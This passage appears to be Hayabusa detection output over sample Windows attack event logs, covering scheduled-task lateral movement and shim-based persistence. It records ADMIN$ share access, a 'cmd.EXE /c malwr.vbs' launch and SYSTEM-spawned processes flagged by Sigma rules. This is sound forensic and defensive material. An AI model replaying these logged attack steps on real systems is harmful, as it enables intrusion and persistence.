Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 